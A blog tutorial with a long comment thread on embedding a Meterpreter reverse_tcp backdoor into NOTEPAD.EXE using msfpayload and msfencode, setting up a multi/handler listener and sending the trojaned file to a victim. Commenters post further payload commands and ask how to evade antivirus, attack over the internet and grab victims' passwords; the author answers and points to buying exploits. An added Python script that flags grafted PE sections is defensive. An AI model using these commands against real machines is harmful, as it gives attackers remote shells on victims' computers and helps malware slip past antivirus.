Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps


How to create an EXE backdoor using Metasploit and BackTrack 5 in 4 simple steps. Have you ever imagined that when you click and open your Notepad application it contains a backdoor or malicious code? Or that when you start your Windows OS it also starts the explorer.exe process, but this explorer.exe contains a backdoor or malicious code? Embedding a backdoor into an EXE file isn't hard to do at all; it's very easy. You can follow the tutorial below to prove that I'm right that it's easy :p LoL 🙂

Requirement :

1. Metasploit Framework 3 (or Metasploit v2)
2. Linux OS (or you can use BackTrack 5, which already includes the Metasploit Framework inside the operating system)

Step By Step Create EXE Backdoor Using Metasploit and Backtrack 5:

1. First of all you should prepare your target EXE file. In this case I will use NOTEPAD.EXE.

2. Next, we use msfpayload to generate a Meterpreter reverse_tcp payload, pipe it into msfencode to inject it into our executable (NOTEPAD.EXE), encode it 5 times (5 iterations) with shikata_ga_nai, and save the backdoored file on the Desktop (the whole command below is one line).

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE


3. Because we selected a reverse Meterpreter payload, we need to set up the exploit handler to receive the connection back to our attacking machine. In this case the attacker uses IP address 192.168.8.92. Open the Metasploit console by typing msfconsole, and then run:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

Don't forget to change LHOST to your own IP address and LPORT to your desired local port.

4. The next step is to send our special NOTEPAD.EXE file (saved as NOTEPAD2.EXE in step 2) to the victim; as soon as they download and open it, a Meterpreter shell opens on the victim's computer:

PWNED 🙂 You can also learn how to apply this method to attack over the internet, but please first read my previous tutorial about the logic of attacking a network outside the LAN (attacking over the WAN). Hope you found this useful. Any comment or correction? Please drop your comment below 🙂
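The defender's side of step 2, as an added example that is not part of the original post: when msfencode -x writes a payload into an existing executable, the resulting PE usually differs structurally from the original (an extra section, a section that is both writable and executable, an entry point moved away from the original code section). The script below parses the PE section table and reports those traces. The PE images it checks are constructed inline as test data, and the heuristics are general PE-structure checks, not a signature for any particular tool.

```python
"""PE section-table heuristics for spotting an executable that has had code grafted on.

Added example, not code from the original post. The tiny PE32 images below are
constructed test data; the checks are generic PE-structure heuristics and will
also fire on legitimately packed or self-modifying binaries, so treat a hit as
a reason to look closer, not as proof of tampering.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(data):
    """Return (AddressOfEntryPoint, [(name, virtual_addr, virtual_size, characteristics)])."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, num_sections, _, _, _, size_of_opt, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    table = opt + size_of_opt
    for i in range(num_sections):
        name, vsize, vaddr, _, _, _, _, _, _, chars = struct.unpack_from(
            SECTION_FMT, data, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), vaddr, vsize, chars))
    return entry_rva, sections


def suspicious_findings(data):
    """Return a list of human-readable findings; an empty list means nothing stood out."""
    entry, sections = parse_pe(data)
    findings = []
    names = [s[0] for s in sections]
    for name in sorted(set(names)):
        if names.count(name) > 1:
            findings.append("duplicate section name %r" % name)
    for name, _, _, chars in sections:
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append("section %r is both writable and executable" % name)
    containing = [i for i, (_, va, vs, _) in enumerate(sections) if va <= entry < va + vs]
    if not containing:
        findings.append("entry point 0x%x lies outside every section" % entry)
    elif len(sections) > 1 and containing[0] == len(sections) - 1:
        findings.append("entry point 0x%x is in the last section %r rather than the first code section"
                        % (entry, sections[-1][0]))
    return findings


def build_pe(sections, entry_rva):
    """Construct a minimal, headers-only PE32 image (test data, not a real program)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva).ljust(224, b"\0")
    table = b"".join(
        struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"), vsize, vaddr, 0, 0, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, chars in sections)
    return dos + b"PE\0\0" + coff + opt + table


CODE_RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Constructed stand-in for an untouched notepad-like binary: entry point inside .text.
CLEAN_PE = build_pe([(".text", 0x1000, 0x2000, CODE_RX), (".data", 0x3000, 0x1000, DATA_RW)], 0x1100)

# Constructed stand-in for a binary with foreign code appended: a second ".text"
# section that is RWX, with the entry point redirected into it.
GRAFTED_PE = build_pe(
    [(".text", 0x1000, 0x2000, CODE_RX), (".data", 0x3000, 0x1000, DATA_RW),
     (".text", 0x4000, 0x1000, CODE_RX | IMAGE_SCN_MEM_WRITE)], 0x4000)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_PE), ("grafted", GRAFTED_PE)):
        print(label, suspicious_findings(image) or ["no findings"])
```

To run it against a real file, read the bytes with open(path, "rb").read() and pass them to suspicious_findings; hashing the original and the suspect file and comparing section tables side by side is the natural next step.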


Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com

Website: http://www.vishnuvalentino.com


  • tarish

    I cannot make it work… my result looks like this:
    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [-] x86/shikata_ga_nai failed: No such file or directory – /root/Desktop/NOTEPAD.EXE
    [-] No encoders succeeded.

    • v4L

      #Tarish
      Did you already put the original NOTEPAD.EXE on your desktop?

      • Vastrix

        try notepad.exe instead of NOTEPAD.EXE 😉

      • Umesh Kumar Sharma

        Hello sir, I am Umesh Sharma from India.
        1. Sir, I have read all your articles on Metasploit and BackTrack 5 with VMware Workstation about ethical hacking, about how to control an outside network like my friend's network, which has a different local IP address and a different public IP address, and I have gained a lot of knowledge from these articles. I have also tried this trick on my friends' computers running Windows XP with my friends' knowledge; I have already told my friends about this matter.

        2. Now sir, I want to discuss the problems I have faced during this operation, and I hope, sir, that you will solve my problems.

        3. I have used these commands for generating the payload.exe file:
        (i) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 X > /root/payload.exe

        (this generates a payload.exe file in my root directory, but it shows up as a virus, which is detected by "Kaspersky, Avira, AVG, Quick Heal antiviruses and so many others")
        (and then for connecting) I have used these parameters:
        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my local ip address ”
        set LPORT 4444
        exploit

        (it's not working; I mean to say that when I opened the payload.exe file on my friend's computer, no "sending stage" came and no meterpreter session opened. I used a pendrive to copy the payload.exe file to my friend's computer because there is a problem sending this file with Gmail, Yahoo, Facebook, eBuddy messenger and other sites, because this file contains a virus. I have also removed the installed antivirus from my friend's computer and turned off the firewall detection. I have also changed the file extension from .exe to another extension when sending this file through internet sites, but the result is the same: it doesn't work and shows the virus)

        (ii) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 X > /root/payload.exe
        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my public ip address ”
        set LPORT 4444
        exploit

        (shows the same problem as written above)

        (iii) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
        >msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
        >msfencode -e x86/countdown -c 2 -t exe | \
        >msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
        >msfencode -x /root/notepad.exe -e x86/call4_dword_xor -t exe -c 5 -o notepad2.exe

        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my local ip address ”
        set LPORT 4444
        exploit
        (shows the same problem as written above)

        (iv) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
        >msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
        >msfencode -e x86/countdown -c 2 -t exe | \
        >msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
        >msfencode -x /root/notepad.exe -e x86/call4_dword_xor -t exe -c 5 -o notepad2.exe

        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my public ip address ”
        set LPORT 4444
        exploit
        (shows the same problem as written above)

        (v) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
        >msfencode -t exe -x /root/putty.exe -e x86/shikata_ga_nai -c 5 -o putty_backdoor.exe

        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my local ip address ”
        set LPORT 4444
        exploit
        (shows the same problem as written above)

        But when I work on a local area network, I mean at a cafe, then it works, but the problem of virus detection is the same.
        Sir, my questions are:
        Does this procedure work on WAN or LAN?
        Can the problem of virus detection be removed or not?
        If the problem of virus detection can be removed, then please tell me how it can be removed.
        How does this procedure work on WAN? I mean to say, how can I open a meterpreter session on my PC when I open the payload.exe file on my friend's network or my friend's PC, which has a different public IP address?

        (NOTE: During this operation my firewall was also disabled)

        • v4L

          #Umesh Kumar Sharma
          Before you go to the WAN, you need to know the characteristics of a network that is "unmanageable" by you. This network is usually set up and configured by your ISP or internet provider. Most internet service providers will flag packets that come to an unknown port as malicious and will drop them. You need to know which ports are allowed and which are not. That's why in the example I used port 80 or 443 both for the exploit and the payload.

          • umesh sharma

            Sir, thanks for the reply,
            but sir, the problem of virus detection remains a problem. Sir, please tell me how the virus can be removed from the payload.exe file. I have used all the commands you have given, but the problem of virus detection remains a problem. Sir, please give a specific solution for this problem.

          • v4L

            #umesh
            About virus detection: it's like a never-ending story. Once you "only find" the exploit on the internet, just wait for hours or days and then the antivirus company will shut it down. You can find many tutorials about how to create your own exploit.

  • tarish

    Thanks.. now it's working fine..

    Can you explain how to hack a remote PC with Metasploit or SET? I have never hacked a remote PC; although I installed a backdoor, my BackTrack 5 machine would not get any incoming connection from the remote machine. I am using VMware Workstation.. please explain this matter..

    Waiting for your better tutorial… thanks..

  • mehdi

    Can I open the victim's computer again after a shutdown without sending him anything?

  • Anonymous

    Asswhole, fucking scams!!!!
    THIS CONNECTS TO HIS IP!! AND THEN LET'S HIM ACCESS YOUR PC! I AM GONNA SCREW UP YOUR IP!! ASSWHOLE AND THIS SITE IS GOING DOWN!!!

  • tester

    ^
    The above poster is so lame.
    On another note, notepad2.exe just dies when I try to open it on the victim (test) Windows machine: "program stopped working". Do you know why?

    • v4L

      #tester
      Yep, just ignore it 😀 maybe he just started learning about computer security 🙂
      Are you using Windows 7 as your victim? If so, maybe the Win 7 DEP and ASLR prevent it from working. You can try it on Windows XP.

  • alpha

    Hey, I managed to exploit my XP computer! I want to try it on a Win7 computer (x64)… is it possible? Any help, any idea plzz

    • v4L

      #alpha
      I haven't tried it on Win7 x64, but maybe it has a different infrastructure from x86…

  • alpha

    Hey, thanx for the quick reply!
    Have you done it on Win 7 32-bit (x86)? Does it work on it, or does it simply refuse to work on Win7? What do you think about Vista?

    • v4L

      #alpha
      No, it can't on Windows 7; it has DEP to prevent exploit execution.. it works on Windows XP.

  • Unknown

    I realized that the session dies after the victim closes our backdoor file, in this case Notepad,
    and the victim's AV Norton 360 shows an alert that this file is not safe to run.
    Any ways to solve those problems?
    And I couldn't use your provided command; I'm facing "no encoder found" and blah blah errors with that.
    I use this, which I found on some blogs:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=5610 R | /pentest/exploits/framework3/msfencode -t exe -x /root/Desktop/notepad.exe -k -o /root/Desktop/calc_backdoor.exe -e x86/shikata_ga_nai -c 5
    Any guides? Solutions?

  • Unknown

    Oh, I forgot: thanks in advance 😡 Awesome blog and articles mate, keep it up

  • DeusIgni

    When the exploit is run it displays "Handler failed to bind to (ip address)". Why is that?
    -DeusIgni

  • DeusIgni

    Also, when the flash drive containing NOTEPAD2.EXE is opened on the target, the system deletes it because it has been detected as a trojan virus. Is there any way to overcome this without turning off the antivirus or having the target download the file? -DeusIgni

    • v4L

      #Deuslgni
      Yep, that's true, it's detected by antivirus… but my purpose here was the logic of how to create a backdoor…

  • DeusIgni

    Which was a very astute tutorial, thank you for that.
    -DeusIgni

  • S2

    This is my problem:

    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [-] x86/shikata_ga_nai failed: Offset 0 outside of image source
    [-] No encoders succeeded.

    What does "offset 0 outside of image source" mean?

  • alex

    Hi. I want to encode virus.exe. When I use msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/virus.exe -o /root/Desktop/virus2.exe it didn't work. I don't get an encrypted file. Can you help me?

    • v4L

      #alex
      Did the iterations already finish, or was there some error message? The file should be placed on your desktop.

  • xuan

    Hi.

    After I double-click the file notepad2.exe on Win XP, it doesn't respond at all.

    Below is the console message:

    ———————————–
    msf exploit(handler) > exploit

    [*] Started reverse handler on 192.168.77.128:443
    [*] Starting the payload handler…
    ————————————-

    What should I do? I am using VMware Workstation to run BT5 and Win XP.

    • v4L

      #xuan
      Did you already set your LHOST to the BT IP address?
      Do you have any firewall / Windows Firewall on your XP machine?

    • Speedstr

      This method is now useless as it is detected by most AVs.
      I am using my own custom method to bypass AV.

  • love bt

    Antivirus can find my backdoor. Why??????

    • v4L

      #love bt
      Sure, of course they will find it; you need to learn how to hide it.
      FYI: your AV database is updated automatically almost every 2 days, so you need to think of a new method + possibility.

      • Is shikata_ga_nai the best encoder to use? I have heard that avoid_utf8_tolower might be a bit better?

        • v4L

          #jbone
          Actually the purpose of encoding is to hide the backdoor from AV, but nowadays they're smart enough to identify malicious files with their specific algorithms, so to find which one is better, maybe you can check whether it is detected by AV or not.

  • adigapro

    Hi v4L, and thanks for this tutorial, it's very useful.

    I have a question:

    What do I need to execute this payload from a remote PC not in my network (like a RAT)?

    I tried this:

    I forwarded port 443 on my router to 192.168.1.4 (my BackTrack PC)

    and set LHOST to my STATIC IP (212.61.*.*)

    and executed it from the remote PC (its IP is 78.93.*.*)

    but Metasploit does not bind.

    When I set LHOST=192.168.1.4

    it binds 192.168.1.4:443

    but it stays like that for a looooong time and no sessions open.

    Please help me.

    Is this the correct way?

    Thanks

    • v4L

      #adigapro
      When you set LHOST to your public IP and it forwards the port 443 packets to your local network, did your BT receive something? If it received some interaction, then it's already connected.

  • mouh

    How can I hack a target with a WAN IP?

    • v4L

      #mouh
      see this post : http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • Dude, don't be so rude when someone asks for help, cause you ain't creating it. If anyone just sees this tutorial, remember IoXx told you how.
    This makes it and encodes it:
    msfpayload windows/meterpreter/reverse_tcp lhost=x.x.189.146 LPORT=443 X > /root/Desktop/NOTEPAD.EXE R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE

    and makes it remote.
    By the way, I ain't stupid, I put a random IP there as an example.

    • v4L

      #loxx
      LoL 😛 only a stupid guy tells others "I'm a good guy" when no one is asking 🙂
      Maybe your neighbours in Windermere can teach you not to do st*pid things 🙂

  • cybersho

    This is my problem as well:

    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [-] x86/shikata_ga_nai failed: Offset 0 outside of image source
    [-] No encoders succeeded.

    The error is: offset 0 outside of image source

    How do I fix it??

    Thanks

    • v4L

      #cybersho
      I have no idea, maybe others here?

  • irfan

    Hi sir, please tell me, is there any way to create a session with Windows 7 without opening file.exe on Windows 7?

    • v4L

      #irfan
      you can look other tutorial here : http://www./category/hacking-tutorial/

      • irfan

        I could not find any suitable tutorial in this article. Please give me any other guideline about hacking Windows 7 without opening a file.exe made by any trojan. I want session hijacking with Windows 7.

  • var

    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [-] x86/shikata_ga_nai failed: No such file or directory – /root/Desktop/notepad.exe
    [-] No encoders succeeded.

    ……. now what??? I am on BackTrack 5 R2….

    • var

      Thank you anyway…. solved it.

  • nick

    Which IP should I use to try to connect to my virtual machine?
    I did ifconfig -a and got the vmnet8 inet addr as 192.168.131.1, but when I tried to use it, I didn't get a connection.

    • v4L

      #nick
      You need to use a bridged connection for your virtual machine.

  • Can I get a screenshot from the victim's PC and get passwords from the victim's PC?

    • v4L

      #shakil
      yes, http://www./tips-and-trick/5-steps-to-screen-capture-victim-screen-using-metasploit-meterpreter/

      • Mustafa

        I am getting the error below. Please help to solve this issue:

        Creating ‘cv.pdf’ file…
        [+] cv.pdf stored at /root/.msf4/local/cv.pdf
        msf exploit(adobe_jbig2decode) > use exploit/multihandler
        [-] Failed to load module: exploit/multihandler

        • v4L

          #Mustafa

          You are missing the "/". It should be multi/handler.

  • Aloysious

    Hi buddy,
    First I want to thank you for the help you have provided on your website about Metasploit. It has helped me a lot.
    I have tried all the encoders multiple times in different ways. Most antivirus products are able to detect the payload.
    Do you know how to encrypt the payload and then decrypt it so that the antivirus is unable to read the encrypted payload?

    Thanks in advance.

  • rhys

    Hello, I have created two blank files on the desktop, notepad.exe and notepad2.exe; when I encode them I get the following error:

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -t exe -x Desktop/notepad.exe -k -o Desktop/notepad2.exe -c x86shikata_ga_nai -c 5
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [-] x86/shikata_ga_nai failed: Offset 0 outside of image source
    [*] php/base64 succeeded with size 526 (iteration=1)
    [*] php/base64 succeeded with size 724 (iteration=2)
    [*] php/base64 succeeded with size 989 (iteration=3)
    [*] php/base64 succeeded with size 1342 (iteration=4)
    [*] php/base64 succeeded with size 1813 (iteration=5)
    [-] php/base64 failed: Offset 0 outside of image source
    [*] cmd/generic_sh succeeded with size 290 (iteration=1)
    [*] cmd/generic_sh succeeded with size 290 (iteration=2)
    [*] cmd/generic_sh succeeded with size 290 (iteration=3)
    [*] cmd/generic_sh succeeded with size 290 (iteration=4)
    [*] cmd/generic_sh succeeded with size 290 (iteration=5)
    [-] cmd/generic_sh failed: Offset 0 outside of image source
    [*] sparc/longxor_tag succeeded with size 344 (iteration=1)
    [*] sparc/longxor_tag succeeded with size 396 (iteration=2)
    [*] sparc/longxor_tag succeeded with size 448 (iteration=3)
    [*] sparc/longxor_tag succeeded with size 500 (iteration=4)
    [*] sparc/longxor_tag succeeded with size 552 (iteration=5)
    [-] sparc/longxor_tag failed: Offset 0 outside of image source
    [-] mipsbe/longxor failed: wrong constant name #
    [-] mipsle/longxor failed: wrong constant name #
    [*] x86/fnstenv_mov succeeded with size 314 (iteration=1)
    [*] x86/fnstenv_mov succeeded with size 338 (iteration=2)
    [*] x86/fnstenv_mov succeeded with size 362 (iteration=3)
    [*] x86/fnstenv_mov succeeded with size 386 (iteration=4)
    [*] x86/fnstenv_mov succeeded with size 410 (iteration=5)
    [-] x86/fnstenv_mov failed: Offset 0 outside of image source
    [*] ppc/longxor succeeded with size 368 (iteration=1)
    [*] ppc/longxor succeeded with size 444 (iteration=2)
    [*] ppc/longxor succeeded with size 520 (iteration=3)
    [*] ppc/longxor succeeded with size 596 (iteration=4)
    [*] ppc/longxor succeeded with size 672 (iteration=5)
    [-] ppc/longxor failed: Offset 0 outside of image source
    [*] ppc/longxor_tag succeeded with size 364 (iteration=1)
    [*] ppc/longxor_tag succeeded with size 436 (iteration=2)
    [*] ppc/longxor_tag succeeded with size 508 (iteration=3)
    [*] ppc/longxor_tag succeeded with size 580 (iteration=4)
    [*] ppc/longxor_tag succeeded with size 652 (iteration=5)
    [-] ppc/longxor_tag failed: Offset 0 outside of image source
    [*] generic/none succeeded with size 290 (iteration=1)
    [*] generic/none succeeded with size 290 (iteration=2)
    [*] generic/none succeeded with size 290 (iteration=3)
    [*] generic/none succeeded with size 290 (iteration=4)
    [*] generic/none succeeded with size 290 (iteration=5)
    [-] generic/none failed: Offset 0 outside of image source
    [*] x64/xor succeeded with size 335 (iteration=1)
    [*] x64/xor succeeded with size 375 (iteration=2)
    [*] x64/xor succeeded with size 415 (iteration=3)
    [*] x64/xor succeeded with size 455 (iteration=4)
    [*] x64/xor succeeded with size 495 (iteration=5)
    [-] x64/xor failed: Offset 0 outside of image source
    [*] x86/call4_dword_xor succeeded with size 316 (iteration=1)
    [*] x86/call4_dword_xor succeeded with size 340 (iteration=2)
    [*] x86/call4_dword_xor succeeded with size 364 (iteration=3)
    [*] x86/call4_dword_xor succeeded with size 388 (iteration=4)
    [*] x86/call4_dword_xor succeeded with size 412 (iteration=5)
    [-] x86/call4_dword_xor failed: Offset 0 outside of image source
    [*] x86/jmp_call_additive succeeded with size 321 (iteration=1)
    [*] x86/jmp_call_additive succeeded with size 353 (iteration=2)
    [*] x86/jmp_call_additive succeeded with size 385 (iteration=3)
    [*] x86/jmp_call_additive succeeded with size 417 (iteration=4)
    [*] x86/jmp_call_additive succeeded with size 449 (iteration=5)
    [-] x86/jmp_call_additive failed: Offset 0 outside of image source
    [*] x86/countdown succeeded with size 308 (iteration=1)
    [*] x86/countdown succeeded with size 326 (iteration=2)
    [*] x86/countdown succeeded with size 344 (iteration=3)
    [*] x86/countdown succeeded with size 362 (iteration=4)
    [*] x86/countdown succeeded with size 380 (iteration=5)
    [-] x86/countdown failed: Offset 0 outside of image source
    [*] x86/nonalpha succeeded with size 410 (iteration=1)
    [-] x86/nonalpha failed: BadChar
    [-] x86/nonupper failed: Encoding failed due to a nil character
    [*] x86/alpha_upper succeeded with size 649 (iteration=1)
    [*] x86/alpha_upper succeeded with size 1367 (iteration=2)
    [*] x86/alpha_upper succeeded with size 2802 (iteration=3)
    [*] x86/alpha_upper succeeded with size 5673 (iteration=4)
    [*] x86/alpha_upper succeeded with size 11414 (iteration=5)
    [-] x86/alpha_upper failed: Offset 0 outside of image source
    [*] cmd/ifs succeeded with size 325 (iteration=1)
    [*] cmd/ifs succeeded with size 325 (iteration=2)
    [*] cmd/ifs succeeded with size 325 (iteration=3)
    [*] cmd/ifs succeeded with size 325 (iteration=4)
    [*] cmd/ifs succeeded with size 325 (iteration=5)
    [-] cmd/ifs failed: Offset 0 outside of image source
    [*] x86/alpha_mixed succeeded with size 641 (iteration=1)
    [*] x86/alpha_mixed succeeded with size 1344 (iteration=2)
    [*] x86/alpha_mixed succeeded with size 2749 (iteration=3)
    [*] x86/alpha_mixed succeeded with size 5559 (iteration=4)
    [*] x86/alpha_mixed succeeded with size 11179 (iteration=5)
    [-] x86/alpha_mixed failed: Offset 0 outside of image source
    /opt/metasploit/msf3/modules/encoders/x86/avoid_utf8_tolower.rb:146:in `decoder_stub': The payload being encoded is of an incompatible size (73 bytes) from /opt/metasploit/msf3/lib/msf/core/encoder.rb:287:in `do_encode'
    from /opt/metasploit/msf3/lib/msf/core/encoder.rb:271:in `encode'
    from /opt/metasploit/msf3/msfencode:250:in `block (2 levels) in '
    from /opt/metasploit/msf3/msfencode:247:in `upto'
    from /opt/metasploit/msf3/msfencode:247:in `block in '
    from /opt/metasploit/msf3/msfencode:237:in `each'
    from /opt/metasploit/msf3/msfencode:237:in `'

    Any help?
    Thanks

    • v4L

      #rhys
      Try removing the -k from your command.

      • rhys

        Thanks for the quick reply, but no luck; I don't know what's wrong. Although, is it acceptable to put 2 blank files on the desktop (right click > create blank file) and rename one to notepad.exe and the other to notepad2.exe?

        • v4L

          #rhys
          No, you can't, or maybe you can try updating your Metasploit Framework (run msfupdate).

  • rhys

    Still no luck. What two exe files should I create on the desktop? Thanks

  • rhys

    What two files should be put on the desktop, and where should I get them from? Also, the update made no change. Just some more information: I am running BackTrack 5 R3 GNOME 64-bit installed to the hard drive.

    • v4L

      #rhys
      Ah, you use 64-bit; try changing the x86 to x64shikata_ga_nai.

      • rhys

        Sorry, no luck. What files should I put on the desktop? You have used a notepad.exe and a notepad2.exe, but where do you get these files and what are the criteria for choosing them? Thank you for persevering, I really appreciate it.

        • v4L

          #rhys
          It's the notepad.exe I got from c:\windows\system32; when I try another exe I can still encode it without error. :/?

  • rhys

    Solved it. I had to set the following on it: allow executing file as a program, removing -k and setting it to x64. The program I used was Notepad++ from http://notepad-plus-plus.org/download/v6.3.html and tada. You sir have a regular follower,
    thank you

  • umesh

    When I run exploit for the payload like that, the message shows like this:

    exploit
    started reverse handler ip:lport
    started payload handler
    killed

    After this message my process stops.
    Is this a problem with the network connection?
    Is this a problem with the firewall being on?

    But it should be noted that my network and the victim's network are OK and my firewall is off.
    If there is any other suggestion then please give it to me, thank u

    • umesh

      The payload.exe file is still detected by antivirus after using all the commands.
      I have also worked on Windows files like "clbcatq.dll" and "wuauclt.exe", but it (payload.exe) is still detected by antivirus.
      I have also made my own exploit, but the problem is still a problem.

      Give ur suggestion

  • umesh

    The problem of virus detection is not removed.
    I have also removed the unwanted characters / bad chars / null bytes ‘\x00\xff\xa1’, something like that, from the payload.exe file, but it is still detected by antivirus.
    How can this problem be removed?

    • v4L

      #umesh
      I've already said it to you in my last comment:
      "create your own exploit"… if you download or use an exploit from the internet (the free ones) or from Metasploit (free), the probability of being detected by antivirus is 99%, and the 1% success is for zero-days.
      If you want an instant one you can buy the exploit at 1337day.com.

      • umesh sharma

        There is no permanent way to remove this virus detection by using encoders. If the encoders are not working, then why are these encoders provided in Metasploit?

        • v4L

          #umesh
          That's why we need to learn 🙂
          Let's say you're a good person; can you imagine how many bad people out there also use this encoder?
          You got the tutorial on how to hide an exploit from antivirus from the internet; do you think the antivirus companies will just sit down and relax without upgrading their systems while they read the same tutorial?
          Be realistic 🙂
          That's why I noted in my last comment: if you want the instant one, then you can buy it without doing the research.

      • sao

        Hi, this is in regard to injecting an exe into a custom PE like notepad.exe. The problem faced is that when we create an exe and inject it into notepad.exe using the -k option and try opening it on the Windows platform, the blank Notepad opens up and then the shellcode is executed. Now I want to know whether there is a way in which the shellcode can be executed without Notepad opening up.

      • umesh

        Sir, when I work on WAN: port 4444 forwarded.. firewall checked…. and public IP checked….

        Now the actual working is…

        use exploit multi/handler

        set payload windows/meterpreter/reverse_tcp

        set LHOST :local IP address

        set Lport : 4444

        exploit

        [*] started reverse handler on local IP:4444

        [*] started payload handler

        OK, now the actual problem comes after this session…. Sir, when I click on the payload file on the WAN network….

        [*] sending stage ….
        This "sending stage" comes, but no meterpreter session is opened…. "sending stage" coming means my file on the WAN network works properly… it means the connection is established…. but no meterpreter session is opened…. I have checked the network signal on both sides…

  • umesh sharma

    I have also removed the bad characters or null characters ‘\x00\xff\xa1’, like that, by using the various encoders, but the problem of virus detection remains a problem. I have also worked on the ‘clbcatq.dll’ and ‘wuauclt.exe’ Windows files, but the problem of virus detection remains a problem.
    How can the virus detection be removed?
    I think the virus detection cannot be removed because BackTrack or Linux is a backdoor testing machine, not for virus removal.

    If u have any other suggestion please give it

  • sao

